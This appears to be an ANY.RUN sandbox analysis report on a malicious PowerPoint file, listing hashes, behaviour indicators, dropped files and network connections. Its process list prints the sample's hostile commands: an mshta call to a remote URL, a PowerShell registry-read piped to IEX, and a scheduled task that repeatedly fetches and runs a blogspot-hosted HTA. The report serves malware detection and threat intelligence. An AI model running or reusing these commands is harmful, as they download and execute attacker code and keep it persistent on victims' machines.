File name: 18cbe831822afef5095d89874bbd2f77.ppt

Full analysis: https://app.any.run/tasks/082e4619-ab77-4e0c-ba65-677a7650130c
Verdict: Malicious activity
Analysis date: September 29, 2020, 22:42:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/vnd.ms-powerpoint
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Matters, Keywords: elements, Last Saved By: Master Mana, Revision Number: 5, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 06:46, Create Time/Date: Thu Sep 24 22:54:19 2020, Last Saved Time/Date: Thu Sep 24 23:01:06 2020, Number of Words: 0
MD5: 18CBE831822AFEF5095D89874BBD2F77
SHA1: DE5908CFF3B04006FBBBF4CDC12B56BC108C419A
SHA256: E3F198D4F0984FA49B890006E2D9F4ADAE221D56D725471BBCBA81564F4BC2B1
SSDEEP: 768:KHRmd650cCBC3Ygu0jOXRvqX3H2z00RLxcjo:KHRmcKX7iH240VJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Starts MSHTA.EXE for opening HTA or HTMLS files
      • POWERPNT.EXE (PID: 2780)
    • Unusual execution from Microsoft Office
      • POWERPNT.EXE (PID: 2780)
    • Changes the autorun value in the registry
      • mshta.exe (PID: 2076)
    • Changes settings of System certificates
      • mshta.exe (PID: 2076)
    • Uses Task Scheduler to run other applications
      • mshta.exe (PID: 2076)
    • Loads the Task Scheduler COM API
      • schtasks.exe (PID: 996)
  • SUSPICIOUS
    • Checks supported languages
      • POWERPNT.EXE (PID: 2124)
      • POWERPNT.EXE (PID: 2780)
    • Reads Internet Cache Settings
      • mshta.exe (PID: 2076)
    • Executed via WMI
      • powershell.exe (PID: 3272)
    • Adds / modifies Windows certificates
      • mshta.exe (PID: 2076)
    • PowerShell script executed
      • powershell.exe (PID: 3272)
    • Creates files in the user directory
      • powershell.exe (PID: 3272)
  • INFO
    • Manual execution by user
      • POWERPNT.EXE (PID: 2780)
    • Creates files in the user directory
      • POWERPNT.EXE (PID: 2780)
    • Reads Microsoft Office registry keys
      • POWERPNT.EXE (PID: 2780)
      • POWERPNT.EXE (PID: 2124)
    • Reads internet explorer settings
      • mshta.exe (PID: 2076)
No Malware configuration.

TRiD

.pps/ppt | Microsoft PowerPoint document (79.7)

EXIF

FlashPix

CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
Title: -
Author: Matters
Keywords: elements
LastModifiedBy: Master Mana
RevisionNumber: 5
Software: Microsoft Office PowerPoint
TotalEditTime: 6.8 minutes
CreateDate: 2020:09:24 21:54:19
ModifyDate: 2020:09:24 22:01:06
Words: -
ThumbnailClip: (Binary data 43336 bytes, use -b option to extract)
CodePage: Windows Latin 1 (Western European)
PresentationTarget: Widescreen
Bytes: -
Paragraphs: -
Slides: -
Notes: -
HiddenSlides: -
MMClips: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Arial
  • Calibri
  • Calibri Light
  • Office Theme
HeadingPairs:
  • Fonts Used
  • 3
  • Theme
  • 1
  • Slide Titles
  • 0
No data.
All screenshots are available in the full report
Total processes: 48
Monitored processes: 5
Malicious processes: 2
Suspicious processes: 1

Behavior graph

Processes shown in the graph: start, powerpnt.exe (no specs), powerpnt.exe (no specs), mshta.exe, powershell.exe (no specs), schtasks.exe (no specs)

Process information

PID: 2124
CMD: "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\admin\Desktop\18cbe831822afef5095d89874bbd2f77.ppt.pps"
Path: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft PowerPoint
Exit code: 0
Version: 14.0.6009.1000

PID: 2780
CMD: "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\Desktop\18cbe831822afef5095d89874bbd2f77.ppt"
Path: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft PowerPoint
Version: 14.0.6009.1000

PID: 2076
CMD: mshta https://%909123id%909123id%909123id%909123id%909123id%909123id%[email protected]\das6d78q3ehjgdbnsavdbnzc
Path: C:\Windows\system32\mshta.exe
Parent process: POWERPNT.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 11.00.9600.16428 (winblue_gdr.131013-1700)

PID: 3272
CMD: powershell ((gp HKCU:\Software).juggga)|IEX
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 996
CMD: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""lunkicharkhi"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta https://madarjaaatresearchers.blogspot.com/p/elevated6666.html""\"", 0 : window.close"\")
Path: C:\Windows\System32\schtasks.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 541
Read events: 1 294
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 14
Text files: 11
Unknown types: 8

Dropped files

PID | Process | Filename | Type
2124 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\CVRAB83.tmp.cvr |
  MD5:
  SHA256:
2780 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\CVR18A0.tmp.cvr |
  MD5:
  SHA256:
2076 | mshta.exe | C:\Users\admin\AppData\Local\Temp\TarCD5.tmp |
  MD5:
  SHA256:
2076 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB | binary
  MD5: 1E5056D8F8B7C140EEF5C15B35E1E24A
  SHA256: 2FB42393AB3227431EA37E5B2406444C8F6309450A4EAFC8229EF7001E23F4BD
2076 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\das6d78q3ehjgdbnsavdbnzc[1].htm | html
  MD5: F237D98E30B1FDBB809E59E5388D8101
  SHA256: 8125AFF31BBCD44F8F3DD840B9621A3531DEC0C41490F81E3926AA1BFF84F6AC
2780 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb
  MD5: C4C9DEC575F1F1E4A98E83AD88CF238D
  SHA256: AB790A6F5EB99C01393157CD05874DAA81C05C1E1A8A2CEF270E833399547D70
2780 | POWERPNT.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text
  MD5: 229712F063FC720B9A179D343F698E56
  SHA256: 7ACBA7C9CAFF9AE3B39191652934E16A8E4EC79B261BC224056165F504E7A525
2076 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\error[1] |
  MD5:
  SHA256:
2076 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\error[1] |
  MD5:
  SHA256:
2076 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\elevated6666[1].htm | html
  MD5: 49219707A511BF0153FE9191E7460893
  SHA256: 17B7B6010BD5F6B5F5136083A782B12E972FBFCD0A5F77017CFF14AF8976B7E3
HTTP(S) requests: 6
TCP/UDP connections: 10
DNS requests: 10
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2076 | mshta.exe | GET | 200 | 142.250.74.227:80 | http://ocsp.pki.goog/gts1o1core/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRCRjDCJxnb3nDwj%2Fxz5aZfZjgXvAQUmNH4bhDrz5vsYJ8YkBug630J%2FSsCEQCMfxdJkM%2FCMwIAAAAAektV | US | der | 472 b | whitelisted
2076 | mshta.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTPJvUY%2Bsl%2Bj4yzQuAcL2oQno5fCgQUUWj%2FkK8CB3U8zNllZGKiErhZcjsCEAt2bSBUjvsrlVzk6sKUDkk%3D | US | der | 471 b | whitelisted
2076 | mshta.exe | GET | 200 | 142.250.74.227:80 | http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjtJqhjYqpgSVpULg%3D | US | der | 468 b | whitelisted
2076 | mshta.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8%3D | US | der | 471 b | whitelisted
2076 | mshta.exe | GET | 200 | 142.250.74.227:80 | http://ocsp.pki.goog/gts1o1core/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRCRjDCJxnb3nDwj%2Fxz5aZfZjgXvAQUmNH4bhDrz5vsYJ8YkBug630J%2FSsCEFz6V9fcgk7eCAAAAABXoJg%3D | US | der | 471 b | whitelisted
1052 | svchost.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D | US | der | 1.47 Kb | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2076 | mshta.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted
2076 | mshta.exe | 172.217.22.137:443 | www.blogger.com | Google Inc. | US | unknown
2076 | mshta.exe | 142.250.74.227:80 | ocsp.pki.goog | Google Inc. | US | whitelisted
2076 | mshta.exe | 67.199.248.17:443 | j.mp | Bitly Inc | US | shared
2076 | mshta.exe | 172.217.22.129:443 | madarjaaatresearchers.blogspot.com | Google Inc. | US | whitelisted
2076 | mshta.exe | 216.58.204.105:443 | resources.blogblog.com | Google Inc. | US | unknown
 |  | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted
2076 | mshta.exe | 216.58.214.77:443 | accounts.google.com | Google Inc. | US | whitelisted

DNS requests

Domain | IP | Reputation
j.mp | 67.199.248.17 | shared
ocsp.digicert.com | 93.184.220.29 | whitelisted
madarjaaatresearchers.blogspot.com | 172.217.22.129 | whitelisted
ocsp.pki.goog | 142.250.74.227 | whitelisted
www.blogger.com | 172.217.22.137 | shared
resources.blogblog.com | 216.58.204.105 | whitelisted
accounts.google.com | 216.58.214.77 | shared
google.com | 216.58.215.46 | whitelisted

Threats

No threats detected
No debug info